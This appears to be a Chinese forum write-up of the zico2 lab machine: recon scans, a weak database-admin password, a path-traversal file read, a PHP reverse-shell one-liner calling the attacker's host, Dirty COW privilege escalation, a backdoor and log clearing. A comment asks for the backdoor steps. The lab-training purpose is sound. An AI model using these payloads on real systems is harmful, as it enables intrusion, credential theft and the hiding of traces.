zico2 靶场从外网到内网渗透

794302313   ·   发表于 2021-03-26 09:19:09   ·   技术文章

1、主机发现
arp-fingerprint arp-scan
192.168.1.164 00:0c:29:01:73:70 VMware, Inc.
2、端口发现
nmap -P 0-65535 192.168.1.164

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind

3、目录扫描
dirb http://192.168.1.164

—— Entering directory: http://192.168.1.164/css/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/dbadmin/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/img/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/js/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/vendor/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

4、弱口令
http://192.168.1.164/dbadmin/
admin

5、任意文件读取
http://192.168.1.164/view.php?page=../../../../../etc/passwd

  1. #只截取了部分
  2. root:x:0:0:root:/root:/bin/bash
  3. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  4. bin:x:2:2:bin:/bin:/bin/sh
  5. sys:x:3:3:sys:/dev:/bin/sh
  6. sync:x:4:65534:sync:/bin:/bin/sync
  7. games:x:5:60:games:/usr/games:/bin/sh
  8. man:x:6:12:man:/var/cache/man:/bin/sh
  9. lp:x:7:7:lp:/var/spool/lpd:/bin/sh

6、在数据库可写入一句话木马
通过任意文件读取
http://192.168.1.164/view.php?page=../../../../..//usr/databases/test.php

7、数据库中的账号
密码解密出来:
root 34kroot34
zico zico2215@
连接ssh,无法连接。

8、在网站数据库中上传脚本文件获取目标靶机的shell;

创建一个数据库:test;
创建一个表:shell,一个字段信息;
Service apache2 start
在KALI的/var/www/html中添加的shell.txt
<?php $sock=fsockopen(“192.168.1.149”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);?>
在数据库插入下载shell.txt的的代码,
在Kali上监听1234端口;浏览器通过任意文件读取访问数据库,成功获取目标的shell;


将shell转换为交互式的tty;
python -c’import pty;pty.spawn(“/bin/bash”)’

9、上传脏牛提权


最终获取一个有root权限的firefart用户,root被覆盖替代

10、查看zico,home目录下的wrodpress下的配置文件,找到zico的账号密码


Ssh连接成功

11、留下后门,日志清除

打赏我,让我更有动力~

1 Reply   |  Until 2021-4-11 | 852 View

spider
发表于 2021-4-11

留门以及清除痕迹的步骤能写出来吗?

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.